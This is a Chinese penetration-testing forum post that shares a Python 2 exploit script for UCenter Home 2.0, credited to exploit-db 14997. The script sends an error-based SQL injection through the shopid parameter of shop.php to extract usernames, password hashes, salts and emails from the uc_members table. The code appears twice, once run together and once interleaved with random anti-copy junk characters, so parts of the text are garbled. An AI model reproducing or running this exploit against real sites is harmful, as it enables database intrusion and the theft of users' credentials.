找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1944|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl% t# e( h# a; I* e6 ^9 q
- x3 \$ B& X/ u3 k" b: a( k
( R- D2 x" B+ |- T8 H; g4 T/ C
#!/usr/bin/env python  " E* l/ g: m9 r1 F
( P- F& E: x) i9 t" W% c$ R6 z
import sys  
4 W/ e: ~' e; F* Himport urllib2  : I  y+ b5 d6 p- ~9 n
import re  
3 h0 E* i$ x2 Q( b7 e& v! a, r 1 {  n/ Z: y, A
def info():  
* i% l: _) V1 L4 ^* p  y    print 'From:http://www.exploit-db.com/exploits/14997/'
1 S2 k# Q- l0 Y4 l# h    print 'http://www.hake.cc/Web_loudong/' 4 h3 l6 y+ d! v& V' j4 Z& r
    print 'changed:qiaoy'  1 ?- t; b, f1 p+ f) ^9 ~
    print 'exp:'  
& J+ N; f) w5 D1 t- ~* s    print ' ./UCenter_Home_2.0.py site'  
" p/ \7 H) r/ x' F( X 3 K/ ^- S1 M) D7 v% Y
def main():  
" @0 E1 _0 ?; R2 g: W    if len(sys.argv) != 2:  $ e" d+ t8 y# ^+ b- \5 c5 G% g5 C( f
        info()  
$ m( u1 r( ^) ~: D# n' Z    else:  6 A9 T+ N  [2 H! q0 O
        site = sys.argv[1]  # Y$ x. s% Y( e+ J, [
        if site[0:7] == 'http://':  
% o6 p2 Y$ B* X            sitesite =site  ( T) q* G$ i8 @8 P8 X5 z9 g- C4 }- c
        elif site[0:8] == 'https://':  
# ]' K: t  P" [" S7 O/ K( V            sitesite = site  
; @  E/ g$ U3 |  f        else:  " Q: j& ~: ]) n& o. Y
            site = 'http://'+site  
& ~  ?( @+ [" U5 C- Q$ E3 t. O        try:  ' f) ~; g$ w  U
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  * C  k- Z- [8 ^2 n2 L( i2 s. \5 X
            Value = urllib2.urlopen(url).read()  ( Y0 T3 H, I1 n
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
" I, d' a  t- {5 l# }9 j  i            hacked = Msg.split(':')  
" r# a8 B1 C' n$ K$ s8 E" f5 K- l/ i            print 'Name:    '+hacked[1]  ( @2 ?& L& {7 t6 u+ M* z, E
            print 'Passwd:  '+hacked[2]  
  J/ h! q& J* J5 p7 l( i            print 'salt:    '+hacked[3]  8 t( i7 R) g0 [/ N5 j
            print 'email:   '+hacked[4]  + k2 l: Q' K% X7 T) a0 F) w4 t
        except:  
3 t1 g. p1 @# R            print 'Sorry,I can\'t work............'  
% C. s. b2 U: h- ]& b9 R - v# X; Y% k' e7 ?; M
if __name__ == '__main__':  
; R0 y! \; B# r( k3 b( j- E    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表